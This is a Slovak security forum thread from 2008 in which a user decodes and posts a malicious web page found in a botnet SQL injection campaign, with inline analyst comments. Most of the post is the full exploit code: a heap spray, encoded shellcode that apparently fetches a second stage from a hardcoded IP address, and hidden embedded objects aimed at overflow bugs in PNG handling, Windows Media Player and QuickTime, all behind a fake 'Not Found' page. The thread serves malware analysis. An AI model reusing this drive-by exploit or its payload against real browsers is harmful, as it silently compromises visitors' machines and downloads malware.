SQL Injection Attack - XSS Code

Description of techniques. Usable for localising and removing errors

SQL Injection Attack - XSS Code

Postby admin on 15.05.2008, 07:05:05

Dnes som sa trosku venoval SQL Injection utokom, ktore roznasaju botnety a narazil som na zdroj. V nom je tento kod.

Ak mate chut pohrat sa, mozete to skusit

Re: SQL Injection Attack - XSS Code

Postby majak on 15.05.2008, 18:01:40

Samotny kod je ako na prvy pohlad vidno zakodovany v base64. Po jeho rozkodovani sa na stranku vypise toto:
<html> <head> <script language="JavaScript">
// ANALYST NOTE: `mm` receives the sprayed heap blocks built by AF2HzmtWv();
// `mem_flag` is set to 1 there and checked by every stage of vLykRiIyjlPO(),
// so the spray runs at most once per page load.
var mm = new Array();
var mem_flag = 0;

// Self-rescheduling 2-second timer, started at the end of AF2HzmtWv().
// `mm = mm` is a no-op touch of the global spray array and `a = 1` writes an
// implicit global; presumably meant to keep the page "busy" and the sprayed
// strings referenced while the plugin stages run (mm is a global, so it would
// stay reachable regardless). The string-argument setTimeout is an implicit
// eval — a cheap static-detection signal next to the unescape("%u…") blob below.
function h() {
      mm = mm;
      a = 1;
      setTimeout("h()", 2000);
}

// Builds the filler string for one spray block: doubles the seed until its
// byte length (UTF-16 code units * 2) is at least bSize, then trims it to
// bSize / 2 code units. Same contract as before; an empty seed never terminates.
function getb(b, bSize) {
      var filler = b;
      for (;;) {
            if (filler.length * 2 >= bSize) {
                  break;
            }
            filler = filler + filler;
      }
      return filler.substring(0, bSize / 2);
}

// Heap spray: fills the global `mm` with ~48 strings of ~4 MiB each, every one
// a filler prefix (`%u0c0c%u0c0c` repeated by getb) followed by the payload `a`.
// Observed constants, all visible in this function:
//  - zc = 202116108 = 0x0C0C0C0C, the same bytes as the filler; used here only as
//    the upper bound that sizes the spray: heapBlocks = (zc - 4 MiB) / 4 MiB ≈ 47.2,
//    so the loop runs 48 times ≈ 192 MiB of strings (a memory-pressure signal).
//  - heapBlockSize = 4194304 (4 MiB); bSize leaves room for the payload's byte
//    length (pls = a.length * 2) plus 56 — presumably string/allocator overhead,
//    not verifiable from this listing.
//  - `a` is the payload delivered via unescape("%u…"). Its tail (from %u7468 on),
//    read as little-endian UTF-16 bytes, appears to decode to the ASCII string
//    "http://66.197.168.5/load.php?FF" — the likely second-stage download URL and
//    the most useful IoC on this page for proxy/DNS log searches.
//  - `heapBlocks` and `i` are implicit globals (no var).
// Returns the spray array; the caller ignores it.
function AF2HzmtWv() {
   var zc = 202116108;
   var a = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u362F%u2E36%u3931%u2E37%u3631%u2E38%u2F35%u6F6C%u6461%u702E%u7068%u463F%u0046");
   var heapBlockSize = 4194304;
   var pls = a.length * 2;
   var bSize = heapBlockSize - (pls + 56);
   var b = unescape("%u0c0c%u0c0c");
   b = getb(b, bSize);
   heapBlocks = (zc - 4194304) / heapBlockSize;
   for (i = 0; i < heapBlocks; i++) {
         mm[i] = b + a;
   }
   mem_flag = 1;
   h();
   return mm;
}
// Three-stage plugin driver, entered from <body onload="vLykRiIyjlPO(0)">.
// Each stage makes sure the heap spray has run (mem_flag), then injects a
// hidden 1x1 <EMBED> into the div "SGbyXZV" via innerHTML; the empty catch
// swallows every error so a missing plugin simply falls through to the next stage.
//  - Stage 0: "buf.png" declared as video/x-ms-wmv.
//  - Stage 1: an SRC made of a long run of dashes plus an A..Z/0-9 marker pattern
//    (with two \x05 bytes) ending in ".wmv". In this listing the literal is split
//    across two lines — presumably forum wrapping; as pasted it would not parse.
//  - Stage 2: "qt.php" declared as video/quicktime.
// The poster maps these to the three Secunia advisories cited below the listing;
// which plugin each stage actually targets cannot be confirmed from the code alone.
// Defensive signals: innerHTML injection of hidden <EMBED> elements, an overlong
// plugin src attribute, catch-all error swallowing, string-argument setTimeout,
// and the decoy "Not Found" body markup.
function vLykRiIyjlPO(num) {
   if (num == 0) {
         try {
               pnghtml = "<embed autostart=\"true\" src=\"buf.png\" type=\"video/x-ms-wmv\" width=\"1\" height=\"1\" controls=\"ImageWindow\" console=\"cons\"></EMBED>";
               if (!mem_flag) {
                     AF2HzmtWv();
               }
               document.getElementById("SGbyXZV").innerHTML = pnghtml;
               num = 255;
         } catch (e) {
         }
         // `=` not `==`: always true, so the `else` branch is dead and the next
         // stage always runs 2 s later (same pattern in stage 1).
         if (num = 255) {
               setTimeout("vLykRiIyjlPO(1)", 2000);
         } else {
               vLykRiIyjlPO(1);
         }
   } else if (num == 1) {
         try {
               emhtml = "<EMBED width=\"1\" height=\"1\" SRC=\"-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAA\x05NNNNOOOOAAA\x05QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv\"></EMBED>";
               if (!mem_flag) {
                     AF2HzmtWv();
               }
               document.getElementById("SGbyXZV").innerHTML = emhtml;
               num = 255;
         } catch (e) {
         }
         // Assignment again: always schedules stage 2 via string setTimeout.
         if (num = 255) {
               setTimeout("vLykRiIyjlPO(2)", 2000);
         } else {
               vLykRiIyjlPO(2);
         }
   } else if (num == 2) {
         try {
               var qthtml = "<EMBED SRC=\"qt.php\" WIDTH=\"10\" HEIGHT=\"10\" TYPE=\"video/quicktime\" />";
               if (!mem_flag) {
                     AF2HzmtWv();
               }
               document.getElementById("SGbyXZV").innerHTML = qthtml;
               num = 255;
         } catch (e) {
         }
   }
}
</script> </head> <body onload="vLykRiIyjlPO(0)"> <div id="SGbyXZV"></div> <H1>Not Found</H1><P>The requested URL / was not found on this server.</P> </body> </html>

Uzivatelovi sa zda, ze stranka sa nenasla, avsak na pozadi sa hned spusti javascript.
Pokusa sa utocit hned troma roznymi buffer overflowmi.
Jeden je problem so spracovanim png obrazka, druhy utoci pomocou chyby vo Windows Media Player plug-inu a treti zneuziva bug v QuickTime.
Ak sa nemylim su to tieto tri zranitelnosti:
http://secunia.com/advisories/20626/
http://secunia.com/advisories/18852/
http://secunia.com/advisories/23540/
Su vyse roka stare, ale boli oznacene ako "Highly critical".
Subory pouzite pri utokoch su v prilozenom archive, ale nie je na nich asi nic zaujimave.
Neviem presne ako funguje buffer overflow, ale vyzera to tak, ze payload ktory sa po preteceni ma vykonat je vlozeny do jedneho velkeho pola, na ktore sa kazde dve sekundy javascript pozrie (funkciou h(), hned na zaciatku.).
Co presne dany binarny kod robi som nezistoval.
Ak ma niekto viete doplnit, potesim sa.

Re: SQL Injection Attack - XSS Code

Postby admin on 15.05.2008, 19:08:48

velice nice rozbor, ako ostatne vzdy ;)

